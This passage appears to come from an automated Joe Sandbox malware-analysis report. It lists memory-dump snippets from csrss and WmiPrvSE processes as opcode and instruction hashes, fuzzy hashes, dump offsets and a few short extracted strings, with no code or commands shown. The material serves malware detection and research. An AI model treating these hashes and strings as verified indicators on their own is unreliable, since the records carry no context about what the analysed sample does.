                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction ID: 9de1e2994fea26cdf7ad3255474e1c9d0e7d0ee054989b0168b0aa26bfda795c
                                      • Opcode Fuzzy Hash: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction Fuzzy Hash: 26D01234B949044F870CBA38C85D8747395EB6A2177E544A9D00AC72B1D96ADC89CB81
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction ID: 8f09ab4a651fb39573b1301ec7c35e3ecac32723bf79141849bfce3baf0314c2
                                      • Opcode Fuzzy Hash: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction Fuzzy Hash: 2ED01234B949044F8B0CBE38C8998747395EB6A216BA540E9D00AC72B1D96ADC89C741
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: fe22828c588cfddbaea4adf16c034d2e6fb1e10eaf42f83b0b44b4f670da0d70
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: 4CC08CE0DCF53F00B4407D3ED7020BCA908BBC8220FF000F3C02C80085AC4D20D50146
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 38a35cc4f78d43621fd59b677c9d7cf33c0390bd8621f7ac56e61f66798fa5de
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: EBC08C304548088FC948FF38C88482437A0FB0D214BE100D0E009CB170E219DCC0C740
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6aaf4b019fa77308620e4be71465424b4aa43b2f278b4d2658964646ad33ed13
                                      • Instruction ID: 823343f87304f63227704f98d70537c48347cbf73da577dbc4df2e067a16ae65
                                      • Opcode Fuzzy Hash: 6aaf4b019fa77308620e4be71465424b4aa43b2f278b4d2658964646ad33ed13
                                      • Instruction Fuzzy Hash: 76C08C80E0DC2652F12B3628C52127E08429F40700FE00078E42FD22CECE0E1A231282
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 81c2a12a3cbd04e33625413bd8526c532172944c35fe772657fb1c371c661f8b
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: C1B01290CDE43F00B4047D7A4A42074B844BB88100FF400F0D41C80085E88D14A40242
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 5a808540bb85373f25323aeca6513dfecf496581c33cce77687c690daf4d83f2
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction ID: b025d66e3f5e36446bec3f6354de4736c738368f86a47395ebb5d53150d88d65
                                      • Opcode Fuzzy Hash: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction Fuzzy Hash: 1151C2D7A0E63285E11336FCF4011FD5B4C9F81275B1886B7DA4E990878E8861BB92F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: 1cedae93df75a641e1f4de021f1693672b90073017a1fd820c084512020bbbfa
                                      • Instruction ID: 7f2724b492e66b17f7a623cf187495e92b7739ac1f0ff40630dd6e4c5d7a25f2
                                      • Opcode Fuzzy Hash: 1cedae93df75a641e1f4de021f1693672b90073017a1fd820c084512020bbbfa
                                      • Instruction Fuzzy Hash: ED91DDB191CAA98FE789EF68C8667B97FE1FB5A300F5001BEC049D72D6CB7818158741
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 181d768770e8af3738453db0207ad2e5f75ef8532b22fdccf16ab6592c7c65b6
                                      • Instruction ID: c0e727edc9009f3846f224cc3ade525a86a12387d3e2cf04853ad0fd3260cef5
                                      • Opcode Fuzzy Hash: 181d768770e8af3738453db0207ad2e5f75ef8532b22fdccf16ab6592c7c65b6
                                      • Instruction Fuzzy Hash: 13415BA2A4D6B54EE306BBB8E09A1FD7F84DF45334B2445FFD94EC7193CD0868528291
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 5889c53bd20c76be5393c005330bc6e9ce54005a896dd6c6b439a7558f3f899d
                                      • Instruction ID: 9829c82409fdeb43eaa8b61145f5b76bad5a7d450c77137c4b7d4067e2165dae
                                      • Opcode Fuzzy Hash: 5889c53bd20c76be5393c005330bc6e9ce54005a896dd6c6b439a7558f3f899d
                                      • Instruction Fuzzy Hash: B23145A1A4EA661EF315BB7CE09B5F97BC9EF45321B6401FED80EC71D3CC0868424295
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: d050395c1b8bc8bc214fa6e484df33ed69180af22b8ad599449785403c46793f
                                      • Instruction ID: 51361e10830d42760bb09292f10e389289bf221ca1e8e610dbc56b90c5f2fb34
                                      • Opcode Fuzzy Hash: d050395c1b8bc8bc214fa6e484df33ed69180af22b8ad599449785403c46793f
                                      • Instruction Fuzzy Hash: 4C3157A0B4D9A90FE749BF3CC09A6B97BC6EF59310B6401FDD44DC32D3CD1498428281
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction ID: 973cd82c01224f201391db865d50190ccd7ba8ea30c81ac30c4862974add1702
                                      • Opcode Fuzzy Hash: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction Fuzzy Hash: 2D21B63130C8184FD768FE1CE889EB977D5FB5932171501BAE59AC7226D911EC8287C1
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f86ced9c166c1f0efc1b4692d2f0c7d35ceaad7af3e8c4242bbd22f57258e58e
                                      • Instruction ID: 017ed5d92c411970891afa63d7efddd52e5fb81d34e655d3973d32c89ec97956
                                      • Opcode Fuzzy Hash: f86ced9c166c1f0efc1b4692d2f0c7d35ceaad7af3e8c4242bbd22f57258e58e
                                      • Instruction Fuzzy Hash: 7E31AF71A0D65A8FDB45FF78C8559B97BE0FF59310B2405FEC01AD72A2DB29A441CB40
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction ID: 90e3b4530d58e859959e78031070858628e3718b7be88cdb6309b45923bf29c3
                                      • Opcode Fuzzy Hash: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction Fuzzy Hash: DEF03A74D48259DFEB10FF68C5845ADBFF0FF44300F3045A5D42197244EA345A448B80
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 0ee713b78647d20b527666bb102ad91e0ec0da5f6ac01c6a044c92693e35cf69
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 97E0ED70A4C1368AFB94BD24D9507B966A4FB85310F7440F89A5E933C2DD29AE448745
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: fe22828c588cfddbaea4adf16c034d2e6fb1e10eaf42f83b0b44b4f670da0d70
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: 4CC08CE0DCF53F00B4407D3ED7020BCA908BBC8220FF000F3C02C80085AC4D20D50146
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 38a35cc4f78d43621fd59b677c9d7cf33c0390bd8621f7ac56e61f66798fa5de
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: EBC08C304548088FC948FF38C88482437A0FB0D214BE100D0E009CB170E219DCC0C740
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1fca8b7b080dbdb2328070ac58729fadafce1110a283f0a4e50246b21ade122e
                                      • Instruction ID: 5bafa4d6c93cf6864faf2d5094da311f52cb99e638faa6bfc7df33e3b699d841
                                      • Opcode Fuzzy Hash: 1fca8b7b080dbdb2328070ac58729fadafce1110a283f0a4e50246b21ade122e
                                      • Instruction Fuzzy Hash: 4BC08C90E0DD2652F22B3628C1222BE08429F40700FE0007CE42EE62CECE0E1A2212C2
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 81c2a12a3cbd04e33625413bd8526c532172944c35fe772657fb1c371c661f8b
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: C1B01290CDE43F00B4047D7A4A42074B844BB88100FF400F0D41C80085E88D14A40242
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 5a808540bb85373f25323aeca6513dfecf496581c33cce77687c690daf4d83f2
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash: